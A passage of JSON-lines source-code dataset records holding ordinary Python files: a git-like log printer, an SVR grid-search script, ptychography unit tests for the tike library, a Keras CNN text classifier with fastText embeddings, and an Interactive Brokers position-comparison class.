[]\nwords.extend(WORD_SPLIT.split(target))\nprint(words)\n\n#%%\nimport string\noriginal = \"axbycz\"\ntable = original.translate(str.maketrans({'a': \"1\"}))\nprint(table)\n","sub_path":"python/basic/string_do.py","file_name":"string_do.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"65858366","text":"#!/usr/bin/env python3\nimport os\nfrom datetime import datetime\nfrom os import path, scandir\nfrom os.path import isfile, join\nfrom utility import get_mtime\n\n\ndef show_log_lgit(args, parent_dir):\n    \"\"\"\n    Show the history of commits, from newest to oldest\n\n    Input:\n        - args: the arguments that were parsed by the parser\n        - parent_dir: the directory that contains the lgit repository\n    \"\"\"\n    # Get the list of commit files\n    dir_entry_list = [dir_entry for dir_entry\n                      in scandir(join(parent_dir, \".lgit/commits\"))\n                      if isfile(dir_entry.path)]\n    # Sort these files by their modification time\n    dir_entry_list.sort(key=get_mtime)\n    # Print the log for each commit file\n    while dir_entry_list:\n        dir_entry = dir_entry_list.pop()\n        print_log(dir_entry)\n\n\ndef print_log(dir_entry):\n    \"\"\"\n    Print the log from a commit directory entry\n\n    Input:\n        - dir_entry: A DirEntry object of the commit object\n    \"\"\"\n    # Read and transform all the needed infos\n    try:\n        commit_file = open(dir_entry.path, \"r\")\n        content = commit_file.readlines()\n        # Get author name\n        author = content[0].rstrip()\n        # Get the time from commit file and reformat it\n        datetime_text = \" \".join([content[1][:4],\n                                  content[1][4:6],\n                                  content[1][6:8],\n                                  content[1][8:10],\n                                  content[1][10:12],\n                                  content[1][12:-1]])\n        # Convert it to human-readable date and time\n        date = datetime.strptime(datetime_text, \"%Y %m %d %H %M %S\").ctime()\n    except PermissionError:\n        return\n    # Print all the infos\n    print(\"\"\"commit %s\nAuthor: %s\nDate:   %s\n\n    %s\n\"\"\" % (dir_entry.name, author, date, content[3]))\n","sub_path":"show_log_lgit.py","file_name":"show_log_lgit.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"216514683","text":"n = int(input())\r\nd = []\r\nfor i in range(n):\r\n    w = input()\r\n    d.append(w)\r\nx = set(d)\r\nd = list(x)\r\nd.sort()\r\nd.sort(key = len)\r\nfor i in d:\r\n    print(i)\r\n","sub_path":"week3/14-7_신예준_20210724.py","file_name":"14-7_신예준_20210724.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"251932196","text":"from sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVR\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\n\nC = (0.1, 0.5, 1, 5, 10)\nkernel = ('linear', 'rbf', 'sigmoid')\nparam_grid = {'C':C, 'kernel':kernel}\nsvr = SVR()\ncvmodel = GridSearchCV(svr, param_grid, refit=True, cv=5)\nmodel_name = sys.argv[0].split('/')[-1].replace('.py','')\npath = sys.argv[1]\nfold = sys.argv[2]\nf_id = sys.argv[3]\ntrn_X = np.load(path+'data2/fold_'+fold+'/train/X/'+f_id+'.npz')['arr_0']\ntrn_y = np.load(path+'data2/fold_'+fold+'/train/y/'+f_id+'.npz')['arr_0']\ntst_X = np.load(path+'data2/fold_'+fold+'/test/X/'+f_id+'.npz')['arr_0']\nscaler = pd.read_pickle(path+'data2/fold_'+fold+'/scaler/'+f_id+'.pickle')\n\ncvmodel.fit(trn_X, trn_y.ravel())\npred_y = scaler.inverse_transform(cvmodel.predict(tst_X))\n\nif not os.path.exists(path+'data2/results/'+model_name+'/fold_'+fold+'/'):\n    
os.makedirs(path+'data2/results/'+model_name+'/fold_'+fold+'/')\nnp.savez_compressed(path+'data2/results/'+model_name+'/fold_'+fold+'/'+f_id+'.npz', pred_y)\npd.to_pickle(cvmodel, path+'data2/results/'+model_name+'/fold_'+fold+'/'+f_id+'.model')\n","sub_path":"experiments/baselines/scripts/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"254849060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# #########################################################################\n# Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved. #\n# #\n# Copyright 2015. UChicago Argonne, LLC. This software was produced #\n# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #\n# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #\n# U.S. Department of Energy. The U.S. Government has rights to use, #\n# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #\n# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #\n# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #\n# modified to produce derivative works, such modified software should #\n# be clearly marked, so as not to confuse it with the version available #\n# from ANL. #\n# #\n# Additionally, redistribution and use in source and binary forms, with #\n# or without modification, are permitted provided that the following #\n# conditions are met: #\n# #\n# * Redistributions of source code must retain the above copyright #\n# notice, this list of conditions and the following disclaimer. #\n# #\n# * Redistributions in binary form must reproduce the above copyright #\n# notice, this list of conditions and the following disclaimer in #\n# the documentation and/or other materials provided with the #\n# distribution. #\n# #\n# * Neither the name of UChicago Argonne, LLC, Argonne National #\n# Laboratory, ANL, the U.S. Government, nor the names of its #\n# contributors may be used to endorse or promote products derived #\n# from this software without specific prior written permission. #\n# #\n# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #\n# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #\n# POSSIBILITY OF SUCH DAMAGE. 
#\n# #########################################################################\n\nimport lzma\nimport os\nimport pickle\nimport unittest\n\nimport numpy as np\n\nimport tike.ptycho\nfrom tike.communicators import Comm, MPIComm\nimport tike.random\n\n__author__ = \"Daniel Ching\"\n__copyright__ = \"Copyright (c) 2018, UChicago Argonne, LLC.\"\n__docformat__ = 'restructuredtext en'\n\ntestdir = os.path.dirname(__file__)\n\n\nclass TestPtychoUtils(unittest.TestCase):\n \"\"\"Test various utility functions for correctness.\"\"\"\n\n def test_gaussian(self):\n \"\"\"Check ptycho.gaussian for correctness.\"\"\"\n fname = os.path.join(testdir, 'data/ptycho_gaussian.pickle.lzma')\n weights = tike.ptycho.probe.gaussian(15, rin=0.8, rout=1.0)\n if os.path.isfile(fname):\n with lzma.open(fname, 'rb') as file:\n truth = pickle.load(file)\n else:\n with lzma.open(fname, 'wb') as file:\n truth = pickle.dump(weights, file)\n np.testing.assert_array_equal(weights, truth)\n\n def test_check_allowed_positions(self):\n psi = np.empty((7, 4, 9))\n probe = np.empty((7, 1, 1, 8, 2, 2))\n scan = np.array([[1, 1], [1, 6.9], [1.1, 1], [1.9, 5.5]])\n tike.ptycho.check_allowed_positions(scan, psi, probe.shape)\n\n for scan in np.array([[1, 7], [1, 0.9], [0.9, 1], [1, 0]]):\n with self.assertRaises(ValueError):\n tike.ptycho.check_allowed_positions(scan, psi, probe.shape)\n\n def test_split_by_scan(self):\n scan = np.mgrid[0:3, 0:3].reshape(2, 1, -1)\n scan = np.moveaxis(scan, 0, -1)\n\n ind = tike.ptycho.ptycho.split_by_scan_stripes(scan, 3, axis=0)\n split = [scan[:, i] for i in ind]\n solution = [\n [[[0, 0], [0, 1], [0, 2]]],\n [[[1, 0], [1, 1], [1, 2]]],\n [[[2, 0], [2, 1], [2, 2]]],\n ]\n np.testing.assert_equal(split, solution)\n\n ind = tike.ptycho.ptycho.split_by_scan_stripes(scan, 3, axis=1)\n split = [scan[:, i] for i in ind]\n solution = [\n [[[0, 0], [1, 0], [2, 0]]],\n [[[0, 1], [1, 1], [2, 1]]],\n [[[0, 2], [1, 2], [2, 2]]],\n ]\n np.testing.assert_equal(split, solution)\n\n\nclass TestPtychoRecon(unittest.TestCase):\n \"\"\"Test various ptychography reconstruction methods for consistency.\"\"\"\n\n def create_dataset(\n self,\n dataset_file,\n pw=16,\n eigen=1,\n width=128,\n ):\n \"\"\"Create a dataset for testing this module.\n\n Only called with setUp detects that `dataset_file` has been deleted.\n \"\"\"\n import libimage\n # Create a stack of phase-only images\n phase = np.stack(\n [libimage.load('satyre', width),\n libimage.load('satyre', width)],\n axis=0,\n )\n amplitude = np.stack(\n [\n 1 - 0 * libimage.load('coins', width),\n 1 - libimage.load('coins', width)\n ],\n axis=0,\n )\n original = amplitude * np.exp(1j * phase * np.pi)\n self.original = original.astype('complex64')\n leading = self.original.shape[:-2]\n\n # Create a multi-probe with gaussian amplitude decreasing as 1/N\n phase = np.stack(\n [\n 1 - libimage.load('cryptomeria', pw),\n 1 - libimage.load('bombus', pw)\n ],\n axis=0,\n )\n weights = 1.0 / np.arange(1, len(phase) + 1)[:, None, None]\n weights = weights * tike.ptycho.probe.gaussian(pw, rin=0.8, rout=1.0)\n probe = weights * np.exp(1j * phase * np.pi)\n self.probe = np.tile(\n probe.astype('complex64'),\n (*leading, 1, eigen, 1, 1, 1),\n )\n\n pad = 2\n v, h = np.meshgrid(\n np.linspace(pad, original.shape[-2] - pw - pad, 13, endpoint=True),\n np.linspace(pad, original.shape[-1] - pw - pad, 13, endpoint=True),\n indexing='ij',\n )\n scan = np.stack((np.ravel(v), np.ravel(h)), axis=1)\n self.scan = np.tile(\n scan.astype('float32'),\n (*leading, 1, 1),\n )\n\n self.data = 
tike.ptycho.simulate(\n detector_shape=pw * 2,\n probe=self.probe,\n scan=self.scan,\n psi=self.original,\n )\n\n assert self.data.shape == (*leading, 13 * 13, pw * 2, pw * 2)\n assert self.data.dtype == 'float32', self.data.dtype\n\n setup_data = [\n self.data,\n self.scan,\n self.probe,\n self.original,\n ]\n with lzma.open(dataset_file, 'wb') as file:\n pickle.dump(setup_data, file)\n\n def setUp(self):\n \"\"\"Load a dataset for reconstruction.\"\"\"\n dataset_file = os.path.join(testdir, 'data/ptycho_setup.pickle.lzma')\n if not os.path.isfile(dataset_file):\n self.create_dataset(dataset_file)\n with lzma.open(dataset_file, 'rb') as file:\n [\n self.data,\n self.scan,\n self.probe,\n self.original,\n ] = pickle.load(file)\n\n def test_consistent_simulate(self):\n \"\"\"Check ptycho.simulate for consistency.\"\"\"\n data = tike.ptycho.simulate(\n detector_shape=self.data.shape[-1],\n probe=self.probe,\n scan=self.scan,\n psi=self.original,\n fly=self.scan.shape[-2] // self.data.shape[-3],\n )\n assert data.dtype == 'float32', data.dtype\n assert self.data.dtype == 'float32', self.data.dtype\n np.testing.assert_array_equal(data.shape, self.data.shape)\n np.testing.assert_allclose(np.sqrt(data), np.sqrt(self.data), atol=1e-6)\n\n def error_metric(self, x):\n \"\"\"Return the error between two arrays.\"\"\"\n return np.linalg.norm(x - self.original)\n\n def template_consistent_algorithm(self, algorithm, params={}):\n \"\"\"Check ptycho.solver.algorithm for consistency.\"\"\"\n\n if params.get('use_mpi') is True:\n with MPIComm() as IO:\n self.scan, self.data = IO.MPIio(self.scan, self.data)\n\n result = {\n 'psi': np.ones_like(self.original),\n 'probe': self.probe * np.random.rand(*self.probe.shape),\n 'scan': self.scan,\n }\n result = tike.ptycho.reconstruct(\n **result,\n **params,\n data=self.data,\n algorithm=algorithm,\n num_iter=1,\n )\n params.update(result)\n result = tike.ptycho.reconstruct(\n **params,\n data=self.data,\n algorithm=algorithm,\n num_iter=32,\n # Only works when probe recovery is false because scaling\n )\n print()\n cost = '\\n'.join(f'{c:1.3e}' for c in result['cost'])\n print(cost)\n try:\n import matplotlib.pyplot as plt\n fname = os.path.join(testdir, 'result', f'{algorithm}')\n os.makedirs(fname, exist_ok=True)\n for i in range(len(self.original)):\n plt.imsave(\n f'{fname}/{i}-phase.png',\n np.angle(result['psi'][i]),\n )\n plt.imsave(\n f'{fname}/{i}-ampli.png',\n np.abs(result['psi'][i]),\n )\n for i in range(self.probe.shape[-3]):\n plt.imsave(\n f'{fname}/{i}-probe-phase.png',\n np.angle(result['probe'][0, 0, 0, i]),\n )\n plt.imsave(\n f'{fname}/{i}-probe-ampli.png',\n np.abs(result['probe'][0, 0, 0, i]),\n )\n except ImportError:\n pass\n\n def test_consistent_cgrad(self):\n \"\"\"Check ptycho.solver.cgrad for consistency.\"\"\"\n self.template_consistent_algorithm(\n 'cgrad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'use_mpi': True,\n },\n )\n\n # def test_consistent_admm(self):\n # \"\"\"Check ptycho.solver.admm for consistency.\"\"\"\n # self.template_consistent_algorithm('admm')\n\n def test_consistent_lstsq_grad(self):\n \"\"\"Check ptycho.solver.lstsq_grad for consistency.\"\"\"\n self.template_consistent_algorithm(\n 'lstsq_grad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'use_mpi': False,\n },\n )\n\n def 
test_consistent_lstsq_grad_variable_probe(self):\n \"\"\"Check ptycho.solver.lstsq_grad for consistency.\"\"\"\n\n eigen_probe = tike.random.numpy_complex(\n *self.scan.shape[:-2], 1, 1, 2,\n *self.probe.shape[-2:]).astype('complex64')\n weights = 1e-6 * np.random.rand(*self.scan.shape[:-1], *\n eigen_probe.shape[-4:-2])\n weights -= np.mean(weights, axis=-3, keepdims=True)\n weights = weights.astype('float32')\n\n self.template_consistent_algorithm(\n 'lstsq_grad',\n params={\n 'subset_is_random': True,\n 'batch_size': int(self.data.shape[1] / 3),\n 'num_gpu': 2,\n 'recover_probe': True,\n 'recover_psi': True,\n 'eigen_probe': eigen_probe,\n 'eigen_weights': weights,\n },\n )\n\n def test_invaid_algorithm_name(self):\n \"\"\"Check that wrong names are handled gracefully.\"\"\"\n with self.assertRaises(ValueError):\n self.template_consistent_algorithm('divided')\n\n\nclass TestProbe(unittest.TestCase):\n\n def test_eigen_probe(self):\n\n leading = (2,)\n wide = 18\n high = 21\n posi = 53\n eigen = 1\n comm = Comm(2, None)\n\n R = comm.pool.bcast(np.random.rand(*leading, posi, 1, 1, wide, high))\n eigen_probe = comm.pool.bcast(np.random.rand(*leading,\n 1, eigen, 1, wide, high))\n weights = np.random.rand(*leading, posi)\n weights -= np.mean(weights)\n weights = comm.pool.bcast(weights)\n patches = comm.pool.bcast(np.random.rand(*leading,\n posi, 1, 1, wide, high))\n diff = comm.pool.bcast(np.random.rand(*leading,\n posi, 1, 1, wide, high))\n\n new_probe, new_weights = tike.ptycho.probe.update_eigen_probe(\n comm=comm,\n R=R,\n eigen_probe=eigen_probe,\n weights=weights,\n patches=patches,\n diff=diff,\n )\n\n assert eigen_probe[0].shape == new_probe[0].shape\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_ptycho.py","file_name":"test_ptycho.py","file_ext":"py","file_size_in_byte":14423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"602369152","text":"\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nimport numpy as np\nimport pandas as pd\nfrom keras import layers\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Dropout, Activation, LSTM\nfrom keras.layers import Input, Flatten, merge, Lambda, Dropout, SpatialDropout1D\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.layers.wrappers import TimeDistributed, Bidirectional\nfrom keras.utils import np_utils, to_categorical\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding\nfrom keras.layers.normalization import BatchNormalization\n\n\nfrom sklearn.model_selection import train_test_split, KFold, GridSearchCV, StratifiedShuffleSplit,StratifiedKFold\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n\n\n\nimport gensim\nfrom gensim.models import Word2Vec\nfrom gensim.utils import simple_preprocess\n\nfrom gensim.models.keyedvectors import KeyedVectors\n\nfrom keras_self_attention import SeqSelfAttention\n# import matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nimport itertools\n\n\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import RegexpTokenizer\n\n\n\nfrom 
sklearn.utils import shuffle\n\n\n\n\n#%%\n#==============================================================================\n# Load the dataset\n#==============================================================================\n\ndata = open(\"Dataset_Fiek_5.0.txt\", encoding=\"utf-8\").read()\ny, docs = [], []\nfor i, line in enumerate(data.split(\"\\n\")):\n content = line.split(\"\\t\")\n docs.append(content[0])\n y.append(content[1])\n\n\n\n\n#%%\n#==============================================================================\n# Encode class values as integers \n#==============================================================================\nencoder = LabelEncoder()\n\nencoder.fit(y)\n\nencoded_y = encoder.transform(y)\n\n# convert integers to dummy variables (i.e. one hot encoded)\ndummy_y = np_utils.to_categorical(encoded_y)\n\n\n\n#%%\n#==============================================================================\n# Define plot_history function\n#==============================================================================\ndef plot_history(history):\n loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' not in s]\n val_loss_list = [s for s in history.history.keys() if 'loss' in s and 'val' in s]\n acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' not in s]\n val_acc_list = [s for s in history.history.keys() if 'acc' in s and 'val' in s]\n \n if len(loss_list) == 0:\n print('Loss is missing in history')\n return \n \n ## As loss always exists\n epochs = range(1,len(history.history[loss_list[0]]) + 1)\n \n ## Loss\n plt.figure(1)\n for l in loss_list:\n plt.plot(epochs, history.history[l], 'b', label='Training loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))\n for l in val_loss_list:\n plt.plot(epochs, history.history[l], 'g', label='Validation loss (' + str(str(format(history.history[l][-1],'.5f'))+')'))\n \n plt.title('Loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n \n ## Accuracy\n plt.figure(2)\n for l in acc_list:\n plt.plot(epochs, history.history[l], 'b', label='Training accuracy (' + str(format(history.history[l][-1],'.5f'))+')')\n for l in val_acc_list: \n plt.plot(epochs, history.history[l], 'g', label='Validation accuracy (' + str(format(history.history[l][-1],'.5f'))+')')\n\n plt.title('Accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n\n\n\n#==============================================================================\n# plot confusion_matrix function\n#==============================================================================\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n title='Normalized confusion matrix'\n else:\n title='Confusion matrix'\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n \n 
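\n# Usage sketch (assumed arrays): cm = confusion_matrix(y_true, y_pred);\n# plot_confusion_matrix(cm, classes=encoder.classes_, normalize=True) renders the\n# heatmap defined above; full_multiclass_report below calls it the same way.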
\n\n#==============================================================================\n# Define full_multiclass_report which prints classification report\n#============================================================================== \n## If binary (sigmoid output), set binary parameter to True\ndef full_multiclass_report(model,\n x,\n y_true,\n classes,\n batch_size=64,\n binary=False):\n\n # 1. Transform one-hot encoded y_true into their class number\n if not binary:\n y_true = np.argmax(y_true,axis=1)\n \n # 2. Predict classes and stores in y_pred\n y_pred = model.predict_classes(x, batch_size=batch_size)\n \n # 3. Print accuracy score\n print(\"Accuracy : \"+ str(accuracy_score(y_true,y_pred)))\n \n print(\"\")\n \n # 4. Print classification report\n print(\"Classification Report\")\n print(classification_report(y_true,y_pred,digits=4)) \n \n \n # 5. Plot confusion matrix\n cnf_matrix = confusion_matrix(y_true,y_pred)\n print(cnf_matrix)\n plot_confusion_matrix(cnf_matrix,classes=classes)\n\n#==============================================================================\n# Input parameters\n#==============================================================================\nMAX_SEQUENCE_LENGTH = 20\nMAX_NB_WORDS = 20000\nEMBEDDING_DIM = 300\n\n\n#==============================================================================\n# Create a tokenizer\n#==============================================================================\n\n\ntokenizer = Tokenizer(nb_words=MAX_NB_WORDS, lower=True )\n\ntokenizer.fit_on_texts(docs)\n\nsequences = tokenizer.texts_to_sequences(docs)\n\nword_index = tokenizer.word_index\n\nprint('Found %s unique tokens.' % len(word_index))\n\n# convert text to sequence of tokens and pad them to ensure equal length vectors \nx = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\n\n\n\n#==============================================================================\n# Training, testing and validation\n#==============================================================================\nseed =1000\n\nx_train, x_test, y_train, y_test = train_test_split(x, dummy_y, train_size=0.7, random_state=seed)\n\nx_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.7, random_state=seed)\n\n\n\n\n#==============================================================================\n# Pretrained FastText embeddings\n#==============================================================================\nprint('loading FastText word embeddings...')\n\nembeddings_index = {}\nwords_not_found=[]\nf=open (\"cc.sq.300.vec\", \"r\", encoding=\"utf-8\")\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\nf.close()\n\nprint('Found %s word vectors.' 
% len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n else:\n words_not_found.append(word)\nprint('Number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n\n\n'''\n\n#==============================================================================\n# Pretrained word2vec embeddings\n#==============================================================================\nword_vectors = KeyedVectors.load_word2vec_format('/Users/zekaaa/Documents/WIMS_2019/GoogleNews-vectors-negative300.bin', binary=True)\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n if i>=MAX_NB_WORDS:\n continue\n try:\n embedding_vector = word_vectors[word]\n embedding_matrix[i] = embedding_vector\n except KeyError:\n embedding_matrix[i]=np.random.normal(0,np.sqrt(0.25),EMBEDDING_DIM)\nprint('Found %s word vectors.' % len(word_vectors.vocab))\ndel(word_vectors)\n\n\n\n#==============================================================================\n# Pretrained Glove embeddings\n#==============================================================================\nembeddings_index = {}\nwords_not_found=[]\nf=open (\"/Users/zekaaa/Documents/WIMS_2019/glove.6B/glove.6b.300d.txt\", \"r\", encoding=\"utf-8\")\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\nf.close()\n\nprint('Found %s word vectors.' % len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n # words not found in embedding index will be all-zeros.\n embedding_matrix[i] = embedding_vector\n else:\n words_not_found.append(word)\nprint('Number of null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0)) \n\n'''\n\n#==============================================================================\n# Build CNN model\n#==============================================================================\nimport keras\n\n\nCNN_Model = Sequential()\n\n'''\n\nCNN_Model.add(layers.Embedding(len(word_index), EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH))\n\n'''\n # Pretrained word2vec and Glove embeddings\nCNN_Model.add(layers.Embedding(len(word_index) + 1,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=False))\n\n\n\nCNN_Model.add(SpatialDropout1D(0.3))\nCNN_Model.add(layers.Conv1D(512, 3, activation='relu'))\n\n\nCNN_Model.add(SeqSelfAttention(attention_width=8, attention_activation='sigmoid', name='Attention',))\n\nCNN_Model.add(layers.GlobalMaxPooling1D())\n\n\n\n\nCNN_Model.add(layers.Dense(3, activation='softmax'))\n\nCNN_Model.compile(loss='categorical_crossentropy',optimizer='adam', metrics=['accuracy'])\n\nCNN_Model.summary()\n\n\n#==============================================================================\n# Evaluate model and print results\n#==============================================================================\n\nCNN_History=CNN_Model.fit(x_train, y_train, epochs = 35, batch_size = 256,verbose=1, validation_data=(x_val,y_val), shuffle=True)\n\nplot_history(CNN_History)\n\nfull_multiclass_report(CNN_Model, x_val, 
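# evaluation here uses the validation split; passing x_test / y_test instead would\n# report held-out test metrics\n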
y_val, encoder.inverse_transform(np.arange(3)))\n\n\n\n\n","sub_path":"Classifiers/1D_CNN_fastText.py","file_name":"1D_CNN_fastText.py","file_ext":"py","file_size_in_byte":11853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61050584","text":"from ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nfrom ibapi.order import *\nfrom datetime import datetime\n\nimport threading\nimport time\nimport json\n\n\nclass IBapi(EWrapper, EClient):\n def __init__(self, client_id):\n EClient.__init__(self, self)\n self.client_id = client_id\n\n def nextValidId(self, orderId: int):\n super().nextValidId(orderId)\n self.nextorderId = orderId\n print('The next valid order id is: ', self.nextorderId)\n\n def updateAccountValue(self, key: str, val: str, currency: str, accountName: str):\n super().updateAccountValue(key, val, currency, accountName)\n # print(\"UpdateAccountValue. Key:\", key, \"Value:\", val,\"Currency:\", currency, \"AccountName:\", accountName)\n\n def updatePortfolio(self, contract: Contract, position: float, marketPrice: float, marketValue: float, averageCost: float, unrealizedPNL: float, realizedPNL: float, accountName: str):\n super().updatePortfolio(contract, position, marketPrice, marketValue,averageCost, unrealizedPNL, realizedPNL, accountName)\n \n if self.client_id == 0: #master update positions size\n try:\n master_details['positions'][contract.symbol] = position\n except:\n master_details['positions'] = {contract.symbol: position}\n pass\n # Master ID\n else:\n try:\n child_details[self.client_id - 1]['positions'][contract.symbol] = position #child update positions size based on clientID\n except:\n child_details[self.client_id - 1]['positions'] = {contract.symbol: position}\n \n for child in child_details: #gets the difference in dict to find positions not the same\n A = list(child['positions'].keys())\n B = list(master_details['positions'].keys())\n commonKeys = set(A) - (set(A) - set(B))\n for key in commonKeys:\n if((child['positions'][key]) * child['risk_divide'] != (master_details['positions'][key])):\n print(key ,\":\" ,(child['positions'][key]) , \" should be \" , (master_details['positions'][key]), \"risk mul:\", child['risk_divide'])\n \n if((child['positions'][key]) > 0 and master_details['positions'][key] > 0 ): #give binary to child\n child['binary_indicator'][key] = [0,0]\n if((child['positions'][key]) > 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [0,1]\n if((child['positions'][key]) < 0 and master_details['positions'][key] > 0 ):\n child['binary_indicator'][key] = [1,0]\n if((child['positions'][key]) < 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [1,1]\n\n if((child['positions'][key]) * child['risk_divide'] == (master_details['positions'][key])): \n child['binary_indicator'][key] = None\n\n for child in child_details:\n print(json.dumps(child['binary_indicator']))\n print(json.dumps(child['positions']))\n\n # print(\"UpdatePortfolio.\", \"Symbol:\", contract.symbol, \"SecType:\", contract.secType, \"Exchange:\", contract.exchange, \"Position:\", position, \"MarketPrice:\", marketPrice,\n # \"MarketValue:\", marketValue, \"AverageCost:\", averageCost,\n # \"UnrealizedPNL:\", unrealizedPNL, \"RealizedPNL:\", realizedPNL,\n # \"AccountName:\", accountName)\n\n def updateAccountTime(self, timeStamp: str):\n super().updateAccountTime(timeStamp)\n # print(\"UpdateAccountTime. 
